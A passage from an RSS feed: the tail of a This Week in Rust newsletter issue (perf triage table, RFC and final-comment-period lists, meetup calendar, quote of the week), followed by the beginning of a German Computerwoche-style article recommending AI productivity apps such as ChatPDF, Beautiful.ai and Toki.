<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.4%</td>
<td>[0.2%, 1.0%]</td>
<td>40</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>0.7%</td>
<td>[0.2%, 4.6%]</td>
<td>69</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-2.0%</td>
<td>[-6.2%, -0.2%]</td>
<td>136</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-2.6%</td>
<td>[-8.4%, -0.2%]</td>
<td>119</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-1.4%</td>
<td>[-6.2%, 1.0%]</td>
<td>176</td>
</tr>
</tbody>
</table>
<p>2 Regressions, 3 Improvements, 6 Mixed; 4 of them in rollups
34 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/189822607d8d09acd85c234b2c245e817591ca67/triage/2026/2026-07-21.md">Full report here</a>.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/issues/159298">Tracking Issue for <code>bool::toggle</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/146954">Tracking Issue for vec_try_remove</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157562">Avoid computing layout of enums with non-int discriminants</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/71835">Tracking Issue for const_btree_len</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/138230">Add <code>raw_borrows_via_references</code> lint</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157572">stabilize size_of_val_raw, align_of_val_raw, Layout::for_value_raw</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158835">rustc_passes: lint unused <code>#[path]</code> attributes on inline modules</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1019">Emit <code>note</code> when calling <code>rustc</code> without specifying an edition</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1011">Let the OS handle stack growth</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1010">Add <code>target_feature_available_at_call_site</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#leadership-council"></a><a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>
<ul>
<li><a href="https://github.com/rust-lang/leadership-council/pull/314">Deallocate post-2026 funds from PM and compiler-ops</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#unsafe-code-guidelines"></a><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>
<ul>
<li><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues/558">Do the bytes of a pointer have to stay in the same order?</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
  <a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
  <a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>,
  <a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a> or
  <a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3984">RFC: Refactor the libs team</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-22 - 2026-08-19 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-24 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/hd8mlw56"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045928/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-31 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/uo5ek1f4"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-01 | Virtual (Kampala, UG) | <a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587">Rust Circle Meetup</a><ul>
<li><a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587"><strong>Rust Circle Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-02 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095294/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315213885/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-08-07 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/ii2jrwva"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-11 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254776/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/313345333/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/315619609/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-08-14 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/f2hnzrug"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315604176/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-08-19 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314105333/"><strong>Dealing with Dependencies</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#africa">Africa</a></h5>
<ul>
<li>2026-08-11 | Johannesburg, ZA | <a href="https://www.meetup.com/johannesburg-rust-meetup">Johannesburg Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/johannesburg-rust-meetup/events/315750593/"><strong>Rust's extended standard library</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-25 | Mumbai, IN | <a href="https://luma.com/mumbai">Rust Mumbai</a><ul>
<li><a href="https://luma.com/7ksabwbm/"><strong>​Rust Mumbai — July Meetup 🦀</strong></a></li>
</ul>
</li>
<li>2026-07-26 | Pune, IN | <a href="https://www.meetup.com/rust-pune">Rust Pune</a><ul>
<li><a href="https://www.meetup.com/rust-pune/events/315651505/"><strong>Rust Pune: July 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/rust-london-user-group">Rust London User Group</a><ul>
<li><a href="https://www.meetup.com/rust-london-user-group/events/315612916/"><strong>LDN Talks: July 2026 Antithesis Takeover</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a><ul>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a><ul>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Stockholm, SE | <a href="https://www.meetup.com/stockholm-rust">Stockholm Rust</a><ul>
<li><a href="https://www.meetup.com/stockholm-rust/events/315749994/"><strong>Ferris' Fika Forum #28</strong></a></li>
</ul>
</li>
<li>2026-07-27 | Augsburg, DE | <a href="https://rust-augsburg.github.io/meetup">Rust Meetup Augsburg</a><ul>
<li><a href="https://rust-augsburg.github.io/meetup/Meetup_20.html"><strong>Rust Meetup #20: Julian Dickert - Supply chain security in Rust: Evaluating crates for production</strong></a></li>
</ul>
</li>
<li>2026-07-29 | Poland, PL | <a href="https://www.meetup.com/rust-poland-meetup">Rust Poland</a><ul>
<li><a href="https://www.meetup.com/rust-poland-meetup/events/315582674/"><strong>Rust Poland x Kraków #10</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Copenhagen, DK | <a href="https://www.meetup.com/copenhagen-rust-community">Copenhagen Rust Community</a><ul>
<li><a href="https://www.meetup.com/copenhagen-rust-community/events/315767999/"><strong>Rust meetup #70</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Manchester, UK | <a href="https://www.meetup.com/rust-manchester">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315037685/"><strong>Rust Manchester July Code Night</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Aarhus, DK | <a href="https://www.meetup.com/rust-aarhus">Rust Aarhus</a><ul>
<li><a href="https://www.meetup.com/rust-aarhus/events/315683629/"><strong>Hack Night: Trust but verify the LLM</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816474/"><strong>Topic TBD</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
</ul>
</li>
<li>2026-07-22 | New York, NY, US | <a href="https://www.meetup.com/rust-nyc/events/">Rust NYC</a><ul>
<li><a href="https://www.meetup.com/rust-nyc/events/315636854/"><strong>Rust NYC: Write A Custom Coding Agent and wasm_zero</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a><ul>
<li><a href="https://www.meetup.com/hackerdojo/events/315418155/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582650/"><strong>Porter Square Rust Lunch, July 25</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/313539329/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
<li>2026-08-01 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582653/"><strong>Chinatown Rust Lunch, Aug 1</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/314660176/"><strong>Evening Boston Rust Meetup at Red Hat, Aug 4</strong></a></li>
</ul>
</li>
<li>2026-08-06 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/314701905/"><strong>Shipping Temporal: How a Global Rust Ecosystem Built Chrome’s Newest Web API</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a><ul>
<li><a href="https://www.meetup.com/utah-rust/events/314696652/"><strong>Utah Rust August Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-13 | San Diego, CA, US | <a href="https://www.meetup.com/san-diego-rust">San Diego Rust</a><ul>
<li><a href="https://www.meetup.com/san-diego-rust/events/315601099/"><strong>San Diego Rust August Meetup - Back in person!</strong></a></li>
</ul>
</li>
<li>2026-08-15 | San Francisco, CA, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/juWAwRs3XMWP7s9wLNWK"><strong>BOG-A-THON 3</strong></a></li>
</ul>
</li>
<li>2026-08-18 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997215/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-08-19 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314105333/"><strong>Dealing with Dependencies</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a><ul>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039480/"><strong>Rust Melbourne July 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#south-america">South America</a></h5>
<ul>
<li>2026-08-08 | São Paulo, SP | <a href="https://luma.com/calendar/cal-bif2oHITU1aVvsr">Rust-SP</a><ul>
<li><a href="https://luma.com/41oiyhtk"><strong>Rust SP - Aug/2026</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>We were planning on publishing a blog post announcing this at the same time as making the repo public, but ran out of private repo CI usage 😭.</p>
</blockquote>
<p>– <a href="https://www.reddit.com/r/rust/comments/1uzknzl/tokiorstopcoat_a_batteriesincluded_framework_for/oy8k2nn/">Carl Lerche on r/rust</a> about the launch of topcoat</p>
<p>Despite a lamentable lack of suggestions, llogiq is glad to have found this quote.</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1v41dgv/this_week_in_rust_661/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten KI-Apps, um Zeit zu sparen]]></title>
<description><![CDATA[Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks.
					Foto: N Universe | shutterstock.com




Unter den Massen von KI-Tools und -Anwendungen, die aktuell als Mobile-, Desktop- oder Web-App zur Wahl stehen, gibt es nicht wenige, die sich...]]></description>
<link>https://tsecurity.de/de/3687939/it-security-nachrichten/die-besten-ki-apps-um-zeit-zu-sparen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687939/it-security-nachrichten/die-besten-ki-apps-um-zeit-zu-sparen/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks." title="Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks." src="https://images.computerwoche.de/bdb/3393107/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks.</p></figcaption></figure><p class="imageCredit">
					Foto: N Universe | shutterstock.com</p></div>




<p class="wp-block-paragraph">Unter den Massen von KI-Tools und -Anwendungen, die aktuell als Mobile-, Desktop- oder Web-App zur Wahl stehen, gibt es nicht wenige, die sich in erster Linie dadurch auszeichnen, dass sie:</p>



<ul class="wp-block-list">
<li><p>Output von fragwürdiger Genauigkeit liefern,</p></li>



<li><p>dubiose Texte erzeugen, oder</p></li>



<li><p>Bilder generieren, die zum Klick auf den X-Button verleiten.</p></li>
</ul>



<p class="wp-block-paragraph">KI-Tools dieser Art sind vor allem darauf ausgerichtet, vom anhaltenden Generative-AI (GenAI)-Hype <a title="zu profitieren" href="https://www.computerwoche.de/article/2823104/9-strategien-gegen-ki-anbieterluegen.html" target="_blank">zu profitieren</a> – und trüben leider auch den Blick für die echten Anwendungsperlen im Bereich generative KI. Wie etwa die folgenden GenAI-Apps, die Ihre Produktivität im Arbeitsalltag drastisch steigern und damit erhebliche Zeitgewinne <a title="realisieren können" href="https://www.computerwoche.de/article/2765021/wie-sie-puenktlich-in-den-feierabend-kommen.html" target="_blank">realisieren können</a>. Probieren Sie’s aus!</p>



<h2 class="wp-block-heading">1. <a href="https://www.chatpdf.com/" target="_blank" rel="noreferrer noopener">ChatPDF</a></h2>



<p class="wp-block-paragraph">Sie kennen solche Situationen: Jemand schickt Ihnen einen schlanken 300-Seiter im .pdf-Format und bereits nach Seite Zwei stellt sich heraus, dass sich dieser in etwa so faszinierend liest wie eine Steuererklärung. In Zukunft dürfen Sie sich bei solchen und ähnlichen Gelegenheiten auf ChatPDF verlassen und dabei richtig Zeit einsparen. </p>



<p class="wp-block-paragraph">Dieses rein webbasierte Tool – nicht zu verwechseln mit gleichnamigen Mobile Apps – tut exakt das, was es verspricht: Sie befähigen, mit .pdf-Dateien <a title="zu chatten" href="https://www.computerwoche.de/article/2830445/5-wege-llms-lokal-auszufuehren.html" target="_blank">zu chatten</a>. Darüber hinaus können Sie über das Webportal auch Office-Dokumente im .doc- oder .docx-Format hochladen, um anschließend dank KI-Unterstützung möglichst schnell und einfach Informationen über den Inhalt zu erfragen. Dabei kann es sich konkret um einfache Zusammenfassungen oder spezifische, inhaltsbezogene Fragen handeln. Sie können bei Bedarf sogar mehrere Dokumente einspeisen und diese gemeinschaftlich abfragen. Die Verantwortlichen von ChatPDF versprechen dabei, sämtliche Daten sicher zu speichern, auf Anfrage zu löschen und keinesfalls an Dritte weiterzugeben. Dennoch sollten sensible unternehmensbezogene Dokumente eher nicht diesen Weg nehmen.</p>



<p class="wp-block-paragraph">ChatPDF verarbeitet davon abgesehen Dokumente in (fast) jeder Sprache – und unterstützt diese auch mit Blick auf die KI-Chat-Funktion. Zwei Dokumente dürfen Sie täglich kostenlos über den Service hochladen und abfragen – wobei die Dateien maximal 120 Seiten lang oder 10 MB groß sein dürfen. Die GenAI-<a title="Webanwendung" href="https://www.computerwoche.de/article/2805798/7-webseiten-die-ihre-desktop-software-ersetzen.html" target="_blank">Webanwendung</a> dürfte also in ihrer kostenlosen Variante bereits für die meisten Gelegenheits-User ausreichend sein. Sollten Sie Bedarf haben, der darüber hinausgeht, steht Ihnen die Bezahlversion ChatPDF Plus ab <strong>24,99 Euro pro Monat</strong> (oder circa <strong>120 Euro pro Jahr</strong>) zur Verfügung.</p>



<h2 class="wp-block-heading">2. <a href="https://www.beautiful.ai/" target="_blank" rel="noreferrer noopener">Beautiful.ai</a></h2>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2763768/so-praesentieren-sie-richtig.html" title="Präsentationen" target="_blank">Präsentationen</a> (richtig) zu erstellen, kann zum Pain geraten. Es sei denn, Sie lassen Generative AI den wesentlichen Teil des Gestaltungsprozesses übernehmen. Das funktioniert mit der KI-basierten Präsentationssoftware Beautiful.ai. Das (möglicherweise) größte Defizit dieses ebenfalls webbasierten KI-Tools ist, dass es zwar auch deutschsprachige Prompts verarbeitet, zur Zeit aber nur englischsprachige Präsentationen erstellt. Das tut es dafür aber richtig gut, wie bereits die Mini-Demo auf der offiziellen Webseite zeigt. Die KI-App unterstützt Sie nicht nur beim Design der einzelnen Folien, sondern auch bei der Formatierung von Inhalten und dabei, Brand Guidelines einzuhalten – sowie bei allen anderen Aspekten, die wichtig sind, damit Ihre Präsentation einen möglichst professionellen Eindruck hinterlässt. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Dieses Slide-Set hat Beautiful.ai in wenigen Sekunden zum Thema Arbeit der Zukunft erstellt. " title="Dieses Slide-Set hat Beautiful.ai in wenigen Sekunden zum Thema Arbeit der Zukunft erstellt. " src="https://images.computerwoche.de/bdb/3393108/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Dieses Slide-Set hat Beautiful.ai in wenigen Sekunden zum Thema Arbeit der Zukunft erstellt. </p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p class="wp-block-paragraph">Die generativen KI-Funktionen des Web-Services umfassen auch eine Funktion, um Inhalte zu generieren. Sie können die KI beispielsweise damit beauftragen, eine ganz bestimmte Art von Präsentation zu einem bestimmten Thema zu erstellen. Dazu zieht die Anwendung öffentlich verfügbare Daten <a href="https://www.computerwoche.de/article/2804141/was-ist-scraping.html" title="heran" target="_blank">heran</a>. Das Ergebnis bedarf zwar sehr wahrscheinlich einer gründlichen Überprüfung, Überarbeitung und Re-Formulierungskur. Dennoch kann es Ihnen eine nützliche erste Grundlage liefern, auf der sich aufbauen und damit potenziell eine Menge Zeit sparen lässt. Beautiful.ai lässt sich mit PowerPoint, Slack, Webex und Dropbox integrieren.</p>



<p class="wp-block-paragraph">Leider gibt’s den KI-Präsentations-Zauber <a title="nicht umsonst" href="https://www.beautiful.ai/pricing" target="_blank" rel="noopener">nicht umsonst</a>. Ein Abonnement für Beautiful.ai kostet für Einzelpersonen <strong>12 Dollar pro Monat</strong>. Im Team mit der GenAI-App zu arbeiten, schlägt mit mindestens <strong>40 Dollar pro Nutzer und Monat</strong> zu Buche. Einen individuellen Enterprise-Preisplan gibt’s auf Anfrage.</p>



<h2 class="wp-block-heading">3. <a href="https://yestoki.com/de" target="_blank" rel="noreferrer noopener">Toki</a></h2>



<p class="wp-block-paragraph">Allen technologiegetriebenen Productivity-Fortschritten zum Trotz bleibt ein Task lästig: mit einem Kalender zu interagieren. Dieser Aufgabe verschreibt sich der KI-Kalenderassistent Toki, der zuvor unter dem Namen Dola bekannt war. Dabei handelt es sich um eine <a title="Chatbot-Lösung" href="https://www.computerwoche.de/article/2807033/was-ist-ein-chatbot.html" target="_blank">Chatbot-Lösung</a>, die sich in die Messaging-Plattformen WhatsApp, Telegram, Line sowie iMessage einbinden lässt und sich anschließend zum Beispiel mit den Kalender-Apps von Google und Apple verbindet. Da dieses KI-Tool das Netzwerkprotokoll CalDAV nutzt, um auf die Kalenderdaten zuzugreifen, müssen Sie im Fall von Outlook leider den Umweg über <a title="ein Drittanbieter-Plugin" href="https://caldavsynchronizer.org/" target="_blank" rel="noopener">ein Drittanbieter-Plugin</a> nehmen.</p>



<p class="wp-block-paragraph">Ist die Integration erledigt, steht Toki über integrierte Schaltflächen in den Messaging-Apps zur Verfügung, um Termine zu erstellen, zu verschieben – oder direkt Fragen zu freien Terminslots zu stellen. Darüber hinaus kann dieses Tool auch genutzt werden, um Termine mit Infos anzureichern – beispielsweise Vorschläge für beliebte Restaurants in einer bestimmten Gegend oder auch Ideen für den neuen Firmenslogan, der beim Meeting gefunden werden soll.</p>



<p class="wp-block-paragraph">Der Service ist in so gut wie allen Sprachen verfügbar und in begrenzten Umfang <a href="https://yestoki.com/de/pricing" target="_blank" rel="noreferrer noopener">kostenlos nutzbar</a>. Zahlende Benutzer erhalten mehr Features ab <strong>3,99 Dollar pro Monat</strong>.</p>



